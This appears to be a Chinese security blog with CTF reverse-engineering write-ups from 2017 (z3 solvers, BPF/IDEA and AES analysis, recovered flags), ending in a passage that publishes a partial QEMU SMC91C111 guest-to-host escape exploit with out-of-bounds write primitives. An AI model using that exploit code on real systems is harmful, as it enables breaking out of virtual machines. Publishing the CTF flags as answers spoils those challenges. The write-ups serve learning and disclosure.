        0x2d, 0x1b, 0xd0, 0xf8, 0x15, 0x2f, 0x6b, 0xbc, 
        0xd2, 0x99, 0x4b, 0xac, 0xe2, 0x6e, 0x32, 0xd8, 
        0x68, 0x95, 0x03, 0x1b, 0xf5, 0xf1, 0xc4, 0xeb, 
        0x18, 0xc3 };
        char peer1_10[] = { /* Packet 222 */
        0x5b, 0x7c, 0xae, 0x1a, 0x19, 0x88, 0x75, 0x7e, 
        0xab, 0x08, 0x6f, 0x1e, 0xaa, 0x04, 0x0e, 0x0d, 
        0xff, 0x7c, 0x0e, 0xef, 0xd0, 0x79, 0x8e };
        char peer0_11[] = { /* Packet 223 */
        0x38, 0x22, 0xd8, 0x99, 0xe8, 0x7b, 0x5e, 0x3a, 
        0x34, 0x88, 0xc8, 0x14, 0x7d, 0xc0, 0xac, 0x7c, 
        0xdb, 0x6f, 0x66, 0x69, 0xd1, 0x3e, 0x48, 0x69, 
        0x68, 0x62, 0x19, 0xb0, 0x62, 0xe7, 0x54, 0x93, 
        0x1f, 0xa5, 0xaf, 0x19, 0x64, 0x73, 0x26, 0xe2, 
        0xc1, 0x03, 0x55, 0xbb, 0x43, 0x97, 0xb6 };
        
#define DEC(x) decrypt(&context,x,sizeof(x));puts(x);
int main(int argc,char **argv)
{
    char key[0x20] = {0xb0, 0xf8, 0x70, 0xfb, 0x75, 0x87, 0xc0, 0x48, 
    0x2b, 0xb7, 0xf7, 0xc1, 0xf7, 0x39, 0x1f, 0x9e, 
    0x66, 0xde, 0x2c, 0xd9, 0x25, 0x58, 0xca, 0x1f, 
    0x87, 0xf2, 0xdf, 0x23, 0x2f, 0xed, 0xc7, 0xda };
    ctx context;
    crypt_ctx_init(&context,key);
    DEC(peer1_2)
    DEC(peer0_3);
    DEC(peer1_3);
    DEC(peer0_4);
    DEC(peer1_4);
    DEC(peer0_5);
    DEC(peer1_5);
    DEC(peer0_6);
    DEC(peer1_6);
    DEC(peer0_7);
    DEC(peer1_7);
    DEC(peer0_8);
    DEC(peer1_8);
    DEC(peer0_9);
    DEC(peer1_9);
    DEC(peer0_10);
    DEC(peer1_10);
    DEC(peer0_11);
    //DEC(peer0_4);
    return 0;
}

HITCON2017 writeup

发表于 2017-11-08 | | 阅读次数:

Reverse

Sakura

一个大函数、稍微IDA里标一下函数名然后grep出来调用顺序到文件，然后把栈上那些变量按顺序填入d = dict()然后直接z3

import z3
x = [z3.BitVec(i, 16) for i in range(400)]
s = z3.Solver()
'''
  pEnd = get_end_pointer_2rp((__int64)&v904);
  if ( sum != 17 )
'''
l = open('haha','r').read().split(')\n')
for token in l:
  if 'rp(' not in token: break
  print token
  pos = token.index('rp(')
  cparameter = int(token[pos-1:pos],10)
  pos = token.index('&v')+1
  print token[pos+2:token.index(';')-2]
  oparameter = int(token[pos+1:token.index(';')-1],10)
  pos = token.index('!= ')
  final = int(token[pos+3:],10)
  flag = 0
  sum = 0
  for i in range(cparameter):
    p = d[oparameter+i*2]*20+d[oparameter+i*2+1]
    s.add(x[p]>0)
    s.add(x[p]<=9)
    s.add((flag>>x[p])&1!=1)
    flag |= 1<<x[p]
    sum+=x[p]
  s.add(sum==final)
print s.check()
if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], x)
    print flag

跑出来

[None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 9, 2, None, None, None, None, 4, 1, None, None, None, None, 9, 1, None, 1, 7, None, 3, 7, 8, 1, 9, 2, None, None, 6, 3, 8, None, 4, 6, 8, 3, None, 2, 9, 6, 1, 8, None, None, 8, 1, None, 7, 1, None, 9, 8, 3, 7, None, None, None, None, 8, 9, None, 9, 2, None, None, None, None, 9, 3, 6, None, 9, 1, 5, None, None, None, None, None, 8, 1, None, 1, 2, None, None, None, 8, 2, 1, 6, None, 2, 8, 4, 3, None, None, None, None, 3, 1, None, 1, 2, None, None, None, None, 4, 9, 8, None, 9, 3, 1, None, 3, 7, None, None, 2, 9, 3, 4, 1, None, None, None, 3, 7, 9, 2, None, 6, 2, None, 1, 9, 2, 8, 3, 7, None, 1, 2, None, 7, 1, 2, 8, None, 1, 7, 2, None, None, None, None, 1, 9, None, None, None, None, None, None, 9, 2, None, None, None, None, 9, 1, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, None, 1, 4, None, 6, 5, None, None, None, 2, 7, 1, None, 4, 9, None, None, None, None, 4, 1, 8, 3, 5, 7, 9, 2, None, None, 8, 9, 6, 4, 1, 2, 7, 5, None, 1, 2, 5, None, 1, 3, None, 7, 3, None, 9, 1, None, None, 5, 3, None, 3, 7, None, 7, 6, None, 7, 2, None, 8, 6, None, None, 8, 6, None, None, None, 2, 6, None, None, None, None, 9, 4, 8, None, 5, 1, 2, None, None, None, 5, 3, None, None, None, 3, 6, None, None, None, 5, 7, None, 1, 8, None, 8, 6, None, None, None, 5, 2, None, None, None, 5, 1, None, 4, 8, None, 4, 9, None, 5, 3, 8, None, 8, 5, None, 6, 9, None, None, 8, 5, None, 1, 7, 8, 6, 3, 2, 9, 4, None, None, 7, 3, 6, 1, 5, 2, 8, 4, None, None, None, 3, 1, None, 7, 4, None, None, None, None, None, None, 3, 5, None, 1, 2, 3, None]

然后"".join(['0' if x==None else str(x) for x in a])
得到答案0000000000000000000000000092000041000091017037819200638046830296180081071098370000890920000936091500000810120008216028430000310120000498093103700293410003792062019283701207128017200001900000092000091000000000000000000000000014065000271049000041835792008964127501250130730910053037076072086008600026000094805120005300036000570180860005200051048049053808506900850178632940073615284000310740000003501230

Seccomp

bpf reverse
首先用工具把汇编导出来，然后观察了一阵发现一共有几个pattern，写一个脚本让流程看的更清楚一点

import struct
def parse():
    s = open('dis.txt', 'rb').read()
    s = s.replace('\r', '').split('\n')
    o = []
    for i in s:
        t = i.split('\t')[1].split(' ')
        o.append(map(lambda x: x.replace(',', ''), t))
    return o

def run(ins):
    def is_match(src,seq):
        seq_c = 0
        for k in range(len(seq)):
            if src[k][0] == seq[k]:
                seq_c +=1
        if seq_c==len(seq):
            return True,[src[0][1],src[-1][1]]
        return False,[]
    def opd(s):
        if s.startswith('[') and s.endswith(']'):
            i = int(s[1:-1])
            if i == 0:
                return 0x1337
            return x[(i - 16) / 4]
        elif s.startswith('#'):
            t = s[1:]
            if t.startswith('0x'):
                return int(t, 16)
            else:
                return int(t, 10)
        elif s.startswith('M[') and s.endswith(']'):
            return M[int(s[2:-1])]
        elif s == 'x':
            return X
        else:
            print s
            raise Exception('wtf')
    def p16(a):
        return struct.pack(">H",a)
    idx = 17
    key = []
    while idx < len(ins):
        i = ins[idx]
        op = i[0]
        if op == 'ld':
            seq = ['ld','jeq','ld','mul','tax','div','mul','neg','add','jeq','ld','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = %s * %d %% 0x10001"%(res[1][1],res[1][0],opd(ins[idx+3][1]))
                key.append(struct.pack(">H",opd(ins[idx+3][1])))
                idx+=len(seq)
                continue
            seq = ['ld','add','and','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = (%s + %d) & 0xffff"%(res[1][1],res[1][0],opd(ins[idx+1][1]))
                key.append(struct.pack(">H",opd(ins[idx+1][1])))
                idx+=len(seq)
                continue
            seq = ['ld','ldx','xor','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = %s ^ %s"%(res[1][1],res[1][0],ins[idx+1][1])
                idx+=len(seq)
                continue
            seq = ['ld','ldx','add','and','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "%s = (%s + %s) & 0xffff"%(res[1][1],res[1][0],ins[idx+1][1])
                idx+=len(seq)
                continue
            seq = ['ld','ldx','stx','st']
            res = is_match(ins[idx:idx+len(seq)],seq)
            if res[0]:
                #print "swap(%s,%s)"%(res[1][1],res[1][0])
                idx+=len(seq)
                continue
            print idx,"error"
            exit()
        elif op=='ldx':
            enc = p16(opd(ins[idx][1])^opd(ins[idx+3+12][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3+8][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3+4][1]))+p16(opd(ins[idx][1])^opd(ins[idx+3][1]))
            print "d = '%s'.decode('hex')"%enc.encode('hex')
        idx+=31
        print 'key = "%s"'%"".join(key)[:16]
        print "cipher = IDEA.new(key,IDEA.MODE_ECB,)\na.append(cipher.decrypt(d)[::-1])"
        key = []
        continue
        print ins[idx]
        print "error"
        exit()
ins = parse()
run(ins)

会发现输入是4个word输出4个word，然后8轮这样的算法，确定是IDEA，改一下上面的脚本输出解密代码

M[0] = M[0] * 26465 % 0x10001
M[1] = (M[1] + 27750) & 0xffff
M[2] = (M[2] + 24421) & 0xffff
M[3] = M[3] * 27489 % 0x10001
M[4] = M[0] ^ M[2]
M[5] = M[1] ^ M[3]
M[4] = M[4] * 26207 % 0x10001
M[5] = (M[4] + M[5]) & 0xffff
M[5] = M[5] * 24927 % 0x10001
M[4] = (M[4] + M[5]) & 0xffff
M[0] = M[0] ^ M[5]
M[1] = M[1] ^ M[4]
M[2] = M[2] ^ M[5]
M[3] = M[3] ^ M[4]
swap(M[2],M[1])

from CryptoPlus.Cipher import IDEA
a = []
d = 'bda9a256044419b0'.decode('hex')
key = "galf_ekaf_a_ma_I"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = '888c2d1a2d5580cd'.decode('hex')
key = "ver_yr7_n0_emoC_"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = 'a0a7aab80005558d'.decode('hex')
key = "nikxxf_siht_esre"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = 'dff79b5d009e1498'.decode('hex')
key = "!selur_pmocces_g"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
d = '8fd875f0c7ef4e09'.decode('hex')
key = "galf_ekaf_a_ma_I"
cipher = IDEA.new(key,IDEA.MODE_ECB,)
a.append(cipher.decrypt(d)[::-1])
print "hitcon{%s}"%"".join(a)

hitcon{w0w_y0u_are_Master-0F-secc0mp///>_w_<///

家徒四壁~Everlasting Imaginative Void~

debug

0x000000e719e62000 0x000000e719e63000 r-xp	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568
0x000000e71a062000 0x000000e71a063000 r--p	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568
0x000000e71a063000 0x000000e71a064000 rw-p	/tmp/void-1b63cbab5d58da4294c2f97d6b60f568

=> 0xe719e62935:	call   0xe719e62284
   0xe719e6293a:	push   0xa
   0xe719e6293c:	pop    rax
   0xe719e6293d:	push   rdi


=> 0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297

!

RAX: 0xe71a062e48 --> 0x1c
RBX: 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f
RCX: 0x4
RDX: 0x1
RSI: 0x0
RDI: 0x7f52f7cb0948 --> 0x0
RBP: 0x7ffe684992c0 --> 0x7f52f7a845f8 --> 0x7f52f7a85c40 --> 0x0
RSP: 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a
RIP: 0xe719e62284 --> 0x3c00200715878a5f
R8 : 0x4
R9 : 0x3
R10: 0x7ffe68499218 --> 0x7f52f7cb09d8 --> 0x7f52f7a8a000 --> 0x10102464c457f
R11: 0x3
R12: 0xe71a062dd0 --> 0xe719e626b0 (cmp    BYTE PTR [rip+0x200969],0x0        # 0xe71a063020)
R13: 0x1
R14: 0x7ffe68499200 --> 0x7f52f7cb1168 --> 0xe719e62000 --> 0x10102464c457f
R15: 0x0
EFLAGS: 0x202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297
[------------------------------------stack-------------------------------------]
0000| 0x7ffe684991f0 --> 0xe719e6293a --> 0x3aef816657580a6a


sys_mprotect(0xe719e62000,0x1000)
RSI: 0x1000
RDI: 0xe719e62000 --> 0x10102464c457f




   0xe719e62284:	pop    rdi
   0xe719e62285:	mov    al,BYTE PTR [rdi+0x200715]
   0xe719e6228b:	cmp    al,0x21
   0xe719e6228d:	jne    0xe719e62297
   0xe719e6228f:	call   rdi
   0xe719e62291:	add    rdi,0x15
   0xe719e62295:	jmp    rdi
   0xe719e62297:	ret

.eh_frame:000000000000094F                 xor     ecx, ecx
.eh_frame:0000000000000951                 add     di, 0FEF9h
.eh_frame:0000000000000956                 push    rdi
.eh_frame:0000000000000957                 push    rdi
.eh_frame:0000000000000958                 pop     rsi
.eh_frame:0000000000000959                 pop     rbx
.eh_frame:000000000000095A
.eh_frame:000000000000095A loc_95A:                                ; CODE XREF: .eh_frame:0000000000000965j
.eh_frame:000000000000095A                 mov     cl, [rsi]
.eh_frame:000000000000095C                 test    cl, cl
.eh_frame:000000000000095E                 js      short loc_967
.eh_frame:0000000000000960                 inc     rsi
.eh_frame:0000000000000963                 rep movsb
.eh_frame:0000000000000965                 jmp     short loc_95A
.eh_frame:0000000000000967 ; ---------------------------------------------------------------------------
.eh_frame:0000000000000967
.eh_frame:0000000000000967 loc_967:                                ; CODE XREF: .eh_frame:000000000000095Ej
.eh_frame:0000000000000967                 add     bx, 17h
.eh_frame:000000000000096B                 jmp     rbx

   0xe719e6285f:	mov    rsi,rbx
   0xe719e62862:	sub    si,0xc7
   0xe719e62867:	add    rbx,0x2007e1
   0xe719e6286e:	movdqu xmm1,XMMWORD PTR [rbx];input
   0xe719e62872:	movdqu xmm0,XMMWORD PTR [rsi];0xfffe07e803fdc148	0xdb312074ed8548ff
   0xe719e62876:	pxor   xmm1,xmm0
   0xe719e6287a:	push   0xa
   0xe719e6287c:	pop    rdi
   0xe719e6287d:	add    rsi,0x10
   0xe719e62881:	movdqu xmm0,XMMWORD PTR [rsi]
   0xe719e62885:	dec    edi
   0xe719e62887:	test   edi,edi
   0xe719e62889:	je     0xe719e62894
   0xe719e6288b:	js     0xe719e6289b negative
=> 0xe719e6288d:	aesenc xmm1,xmm0
   0xe719e62892:	jmp    0xe719e6287d
   0xe719e62894:	aesenclast xmm1,xmm0
   0xe719e62899:	jmp    0xe719e6287d
   0xe719e6289b:	ucomisd xmm0,xmm1
   0xe719e6289f:	je     0xe719e628a2
   0xe719e628a1:	ret


_mm_aesenclast_si128
_mm_aesenc_si128


aesenc xmm1,xmm0 0x10 times
aesenclast xmm1,xmm0
cmp xmm0,xmm1

   0xe719e628a2:	neg    edi
   0xe719e628a4:	push   rdi
   0xe719e628a5:	pop    rax
   0xe719e628a6:	add    rsi,0x10
   0xe719e628aa:	call   0xe719e62948

   0xe719e62948:	push   0x7
   0xe719e6294a:	pop    rdx
   0xe719e6294b:	syscall
   0xe719e6294d:	pop    rdi
   0xe719e6294e:	ret

   gdb-peda$ x/10gx $rsi
0xe719e62798:	0xfffe07e803fdc148,0xdb312074ed8548ff ; init

0xe719e627a8:	0x0000000000841f0f,0x8944f6894cea894c
0xe719e627b8:	0xc38348dc14ff41ff,0x8348ea75dd394801
0xe719e627c8:	0x5d415c415d5b08c4,0x2e6690c35f415e41
0xe719e627d8:	0x0000000000841f0f,0x08ec83480000c3f3
0xe719e627e8:	0x000000c308c48348,0x6800732500020001
0xe719e627f8:	0x73257b6e6f637469,0x3b031b0100000a7d
0xe719e62808:	0x0000000700000040,0x0000008cfffffdbc
0xe719e62818:	0x000000b4fffffdcc,0x0000005cfffffdec
0xe719e62828:	0x000000ccffffff1c,0x000000ecffffff57
0xe719e62838:	0x0000010cffffff6c,0x00000154ffffffdc
0xe719e62848:	0x47cf6d49120447e7,0x2846fb67171be9b0 ; final

   hex(0xe719e6285f-0x000000e719e62000)

#include <stdio.h>
#include <string.h>
#include <tmmintrin.h>
#include <wmmintrin.h>

int main () {
    __int64_t a[2] = {0,0};
    __int64_t round_key[] = {0xfffe07e803fdc148,0xdb312074ed8548ff,0x0000000000841f0f,0x8944f6894cea894c,0xc38348dc14ff41ff,0x8348ea75dd394801,0x5d415c415d5b08c4,0x2e6690c35f415e41,0x0000000000841f0f,0x08ec83480000c3f3,0x000000c308c48348,0x6800732500020001,0x73257b6e6f637469,0x3b031b0100000a7d,0x0000000700000040,0x0000008cfffffdbc,0x000000b4fffffdcc,0x0000005cfffffdec,0x000000ccffffff1c,0x000000ecffffff57};
    __int64_t final[] = {0x47cf6d49120447e7^0x0000010cffffff6c,0x2846fb67171be9b0^0x00000154ffffffdc};
    __m128i mfinal = _mm_load_si128((__m128i *)final);
    for (int i=0;i<9;i++)
    {
        __int64_t* b = &round_key[(9-i)*2];
        __m128i key = _mm_load_si128((__m128i *)b);
        printf("Round key %d: %016llx %016llx\n",9-i,b[0],b[1]);
        mfinal = _mm_aesdec_si128(mfinal,_mm_aesimc_si128(key));
    }
    __m128i key = _mm_load_si128((__m128i *)&round_key);
    mfinal = _mm_aesdeclast_si128(mfinal,(key));
    _mm_storeu_si128(a, mfinal);
    printf("%llx %llx",a[0],a[1]);
    return 0;
}

天衣無縫~Fantastic Seamless Textile~

https://gist.github.com/pzread/2ae0bb3aa5fe0dc69fcf3257c41db944
https://github.com/radare/radare2/pull/8796

Pwn2Win2017 writeup

发表于 2017-10-23 | | 阅读次数:

周末做了两道题，想尝试下ppc结果因为电阻间不同阻值只存了后面那个被坑了一整天……Orz

PPC-M

Resistance

列KVL，设起点电压10终点电压0，然后z3求解。主办方表示卧槽这题z3居然能做？比预期解慢，但是起码是对的(:з)∠)

#!/usr/bin/python2
import ssl, socket
import z3

y = [z3.Real('a_%d'%i) for i in range(30)]
d = dict()
connection = dict()
nodes = set()

class Connect(object):
    def __init__(self, host, port):
        self.context = ssl.create_default_context()
        self.conn = self.context.wrap_socket(
            socket.socket(socket.AF_INET),
            server_hostname=host)
        self.conn.connect((host, port))
        self.f = self.conn.makefile('rwb', 0)
    def __enter__(self):
        return self.f
    def __exit__(self, type, value, traceback):
        self.f.close()

ncount = 0
with Connect('programming.pwn2win.party', 9001) as f:
#b = open('d.txt','w')
#with open('test.txt','rb') as f:
    for line in f:
        line = line.strip()
        print('received: %s' % line)

        if line.startswith(b'CTF-BR{') or \
           line == b'WRONG ANSWER': break

        numbers = map(int, line.split())
        if len(numbers)==3:
            if ncount==0:
                d = dict()
                connection = dict()
                nodes = set()
                            
            nodes.add(numbers[0])
            nodes.add(numbers[1])
            ar = min(numbers[0],numbers[1]),max(numbers[0],numbers[1])
            if ar not in d.keys():
                d[ar] = [numbers[2]]
            else:
                d[ar].append(numbers[2])
            if numbers[0] in connection.keys():
                if numbers[1] not in connection[numbers[0]]:
                    connection[numbers[0]].append(numbers[1])
            else:
                connection[numbers[0]] = [numbers[1]]
            if numbers[1] in connection.keys():
                if numbers[0] not in connection[numbers[1]]:
                    connection[numbers[1]].append(numbers[0])
            else:
                connection[numbers[1]] = [numbers[0]]

            ncount+=1

        elif len(numbers) == 2:
            ncount = 0
            if numbers[0]==numbers[1]:
                f.write('0.000\n')
                print "0.000"
                continue
            #solve all KVL
            s = z3.Solver()
            for m in nodes:
                sum = 0
                if m!=numbers[0] and m!=numbers[1]:
                    for n in connection[m]:
                        for k in d[min(n,m),max(n,m)]:
                            sum += ((y[m] - y[n]) / k)
                    s.add(sum == 0.0)
            s.add(y[numbers[0]]==10.0)
            s.add(y[numbers[1]]==0.0)
            s.check()
            m = s.model()
            #print m
            flag = map(lambda sym: m[sym], y)
            start = float(eval(str(flag[numbers[0]])+'.'))
            sum=0
            for n in connection[numbers[0]]:
                for k in d[min(numbers[0],n),max(n,numbers[0])]:
                    sum+=(m[y[numbers[0]]]-m[y[n]])/k
            sum = eval(str(z3.simplify(sum))+'.')
            f.write(("%.3f\n"%(10.0/sum)).encode('utf-8'))
            print "%.3f"%(10.0/sum)

Reversing

Achievement Unlocked

golang 写的，没啥好说的，z3解

import z3
ans_len = 30
y = z3.BitVecs(' '.join("a_%d"%i for i in xrange(ans_len)), 8)
x = [0]*ans_len
for i in range(ans_len):
    x[i] = z3.ZeroExt(8,y[i])

s = z3.Solver()

a = [217, 6, 224, 68, 21, 153, 30, 144, 249, 89, 109, 245, 111, 55, 163, 40, 174, 21, 115, 99, 173, 42, 12, 209, 143, 226, 47, 136, 158, 158, 58, 77, 67, 84, 70, 45, 66, 82, 123, 84, 104, 105, 115, 95, 67, 48, 85, 108, 100, 95, 66, 51, 95, 52, 83, 95, 101, 97, 83, 121, 95, 52, 115, 95, 116, 104, 49, 83, 125, 10, 19, 152, 116, 104, 49, 83, 125, 10, 19, 152, 81, 237, 69, 212, 147, 42, 94, 184, 20, 227, 251, 168, 210, 97, 183, 36, 147, 236, 35, 65, 192, 16, 128, 188, 52, 149, 46, 138, 17, 251, 86, 163, 62, 195, 119, 228, 54, 102, 57, 36, 145, 140, 174, 140, 172, 177, 154, 104, 150, 90, 39, 38, 237, 31, 142, 48, 59, 159, 63, 113, 82, 37, 81, 227, 122, 33, 149, 58, 87, 62, 78, 112, 54, 230, 37, 243, 4, 116, 210, 236, 47, 178, 81, 162, 38, 87, 131, 170, 100, 119, 36, 176, 131, 91, 119, 31, 57, 195, 53, 107, 14, 58, 20, 68, 20, 246, 207, 24, 82, 216, 21, 189, 18, 121, 155, 211, 192, 5, 248, 127, 229, 253, 124, 116, 67, 78, 43, 111, 75, 168, 11, 144, 29, 36, 28, 203, 224, 184, 10, 84, 30, 100, 168, 142, 164, 142, 34, 220, 96, 173, 118, 173, 157, 49, 231, 219, 13, 49, 35, 13]
final = [208, 113, 230, 50, 15, 58, 9, 46, 248, 161, 182, 82, 222, 205, 101, 114, 82, 159, 79, 185, 244, 114, 118, 193, 52, 53, 238, 247, 218, 80]

for i in range(len(a)/8):
    m = a[i*8:(i+1)*8]
    for j in range(8):
        x[i] = (1<<j)&m[j]^x[i]

for i in range(ans_len):
    s.add(x[i]==final[i])

if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], y)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print len(flag)
    print ''.join(flag)

Hack.lu 2017 writeup

发表于 2017-10-19 | | 阅读次数:

TO BE CONTINUE
这两天做了hacklu2017，随便写写，有空再补了。其实比较倒霉，6点比赛结束，6点02算出了LostKey的flag……手速还是不行啊，得多练……

Pwn

bit

40072b:4 - > loop
overwrite main ret instruction to long jump to start of main function input logic and reflip 40072b:4. Then write the shellcode to 0400741, and finally reflip 40072b:4 to get shellcode execute.

Rev

The Maya Society

13.0.0.0 on the home page is not a ip address, it’s 2012.12.21 in Maya calendar, just set the time to 2012.12.11 and run the program to get the flag.

Rusted from the Rain

Reverse and write script to solve.

import z3

ans_len = 28
y = z3.BitVecs(' '.join("a_%d"%i for i in xrange(ans_len)), 8)
x = [0]*ans_len
for i in range(ans_len):
    x[i] = z3.ZeroExt(8,y[i])

s = z3.Solver()
s.add(x[13]==x[14])
s.add(x[18]==x[19])
s.add(x[5]==x[26])
s.add(x[23]==x[7])
s.add(x[9]==x[16])
s.add(x[9]==x[21])
s.add(x[8]==x[22])

s.add(x[27]-x[4]==2)
s.add(x[0] ==63+7)
s.add(x[1] ==63+0xd)
s.add(x[2] ==63+2)
s.add(x[3] ==63+8)

s.add(x[21] <= 0x60)
s.add(x[14] + x[18] == 0xD1)
s.add(x[14] - x[18] == 7)
s.add(x[10] == x[15])
s.add((~x[24])&0xff & x[17]== 0)
s.add(x[17] == 115)
s.add((~(x[10] ^ 0x73)) & 0xFF == 0xFF)
s.add(((2 * x[25])&0xff) % x[24] == 2)

v12 = (x[23] + x[25])&0xff
s.add((v12 - 99 * ((83 * v12 & 0x6000) >> 13))== 35)
s.add(3 * x[11] + 2 * x[12] + x[20] == 640)
s.add( x[6] - 35 * ((235 * x[6] & 0xE000) >> 13) == 6)
s.add(x[8] != 0)
s.add((((2 * x[6])&0xff) % x[8]) & 0xFF == x[14] )
res = [0x7fed,0xfb11,0xeabe,0x2631]

for i in range(4):
	v17 = 0
	v20 = 0
	for j in range(7):
		v20 = (v20 + x[i*7+j]) % 0xFF
		v17 = (v20 + v17) % 0xFF
	s.add(res[i] == (v17 | (v20 << 8)))

if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], y)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print len(flag)
    print ''.join(flag)

LostKey

4 processes created by clone, shared memory. When the program init, some rops will be filled in each process’s stack, and the rops are the thing that check your flag.

anti-debug will be used in perior 3 processes, and generate the key to decode the input in thread 4.

So just track the right rops to get the algorithm. And write some scripts to calculate the flag.

Web,Rev

Triangle

Use chrome to decode the ARM binary code, we got two function, encode and test. Write a script to solve the problem.

import z3

x = [z3.BitVec(i, 8) for i in range(32)]
y = [0] * 32
s = z3.Solver()

a = "XYzaSAAX_PBssisodjsal_sSUVWZYYYb"
b = map(ord, a)

flag = 0
for i in range(32):
    ch = x[i]
    ch = z3.If(flag == 1, ch + (i & 3), ch)
    temp = ch + 6
    flag = temp & 1
    y[i] = temp

for i in range(32):
    ch = y[i] + 5
    if i & 1:
        ch = y[i] + 2
    s.add(ch == b[i])

if s.check() == z3.sat:
    m = s.model()
    print m
    flag = map(lambda sym: m[sym], x)
    flag = map(lambda val: chr(int(str(val))), flag)  # wtf
    print ''.join(flag)

Misc, Web

DnSoSecure

source audit, download the source.zip
git log and checkout last branch

get private and public key for setting up DNSSEC server.

ref:https://www.digitalocean.com/community/tutorials/how-to-setup-dnssec-on-an-authoritative-bind-dns-server--2

named.conf.default-zone

zone "otherside.earth.flux"{
	type master;
	file "/etc/bind/master/otherside.earth.flux.db.signed";
	allow-update { none; };
};

otherside.earth.flux.db

$TTL    3600
@       IN      SOA     ns1.otherside.earth.flux. root.otherside.earth.flux. (
                        2014072202; Serial
                        3600            ; Refresh
                        86400           ; Retry
                        2419200         ; Expire
                        604800 )        ; Negative Cache TTL
;
@       IN      A       127.0.0.1
@       IN      NS      ns1.earth.flux.
ns1	IN	A	127.0.0.1
$INCLUDE Kotherside.earth.flux.+007+11537.key
$INCLUDE Kotherside.earth.flux.+007+26883.key

use this command to sign and gen RRSIG

1	dnssec-signzone -A -3 $(head -c 1000 /dev/random \| sha1sum \| cut -b 1-16) -N INCREMENT -o otherside.earth.flux. -t otherside.earth.flux.db

use rndc reload to reload bind9 config

CAUTION: The file name must be like this

1
2

Kotherside.earth.flux.+007+11537.key      Kotherside.earth.flux.+007+26883.key      dsset-otherside.earth.flux.  otherside.earth.flux.db.signed
Kotherside.earth.flux.+007+11537.private  Kotherside.earth.flux.+007+26883.private  otherside.earth.flux.db

same as zone name. It’s important.

sudo apt install rng-tools to speed up sign progress

A qemu escape - SMC911 exploit

发表于 2017-08-22 | | 阅读次数:

中午整理Macbook硬盘的时候发现了这个半年前看到的然而并没有要来CVE号的漏洞。
嗯、反正也修了半年了，放个exploit……感谢白兔师傅和谢大哥的帮助。纪念那段从来没有挖到过qemu CVE的时光……

Mail

Hello Azure,

On Mon, 24 Oct 2016 09:02:19 GMT, azureyang# wrote:
> I found a OOB read/write bug that can cause code execution on host.
> The relation code is in
> hw/net/smc91c111.c:447
> s->data[n][p] = value;
> hw/net/smc91c111.c:553
> return s->data[n][p];
>
> failed to check the border of the passed value, the packet_num and ptr
> can be set by guest mmio operations. With the overwrite of s->mmio-
> >ops, code execution can be achieved.

Thank you so much for reporting this issue. A patch has been sent upstream to fix this issue.

IIUC, the SMSC91C111 ethernet controller is used on the ARM Versatile EP and other similar platforms. Which are mostly used in the prototype development environments. These platforms are not generally used with KVM to provide virtualised guest environments. We could not consider this issue for a CVE as the upstream Qemu project does not consider these issues to be security relevant.

Please see:
->
http://wiki.qemu.org/SecurityProcess#How_impact_and_severity_of_a_bug_is_decided

Thank you so much!
---
Prasad J Pandit / Red Hat Product Security

exploit

#include <linux/init.h>
#include <linux/module.h>
#include <linux/slab.h>

#define SMC911_BASE           (unsigned char *)0xd09a6000

void write_on()
{
    unsigned char * addr = SMC911_BASE;
    addr[14] = 2;
}

void set_addr(uint64_t offset)
{
    unsigned char * addr = SMC911_BASE;
    uint64_t ptr = offset%0x800;
    addr[2] = offset/0x800;
    addr[6] = ptr&0xff;
    addr[7] = ptr>>8;
}

void set_uint8(uint64_t offset,uint8_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    addr[8] = value;
}

void set_uint16(uint64_t offset,uint16_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint16_t *)&addr[8] = value;
}

void set_uint32(uint64_t offset,uint32_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value;
}

void set_uint64(uint64_t offset,uint64_t value)
{
    unsigned char * addr = SMC911_BASE;
    set_addr(offset);
    *(uint32_t *)&addr[8] = value&0xFFFFFFFF;
    set_addr(offset+4);
    *(uint32_t *)&addr[8] = value>>32;
}

void set_memset(uint64_t offset,uint64_t value,uint64_t cbmem)
{
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(offset+i,value);
    }
}

void set_memcpy(uint64_t dst_offset,void * src,uint64_t cbmem)
{
    uint8_t * uc_src = (uint8_t*)src; 
    uint64_t i = 0;
    for (i = 0;i<cbmem;i+=8)
    {
        set_uint64(dst_offset+i,*(uint64_t *)(uc_src+i));
    }
}

uint8_t get_uint8(uint64_t offset)
{
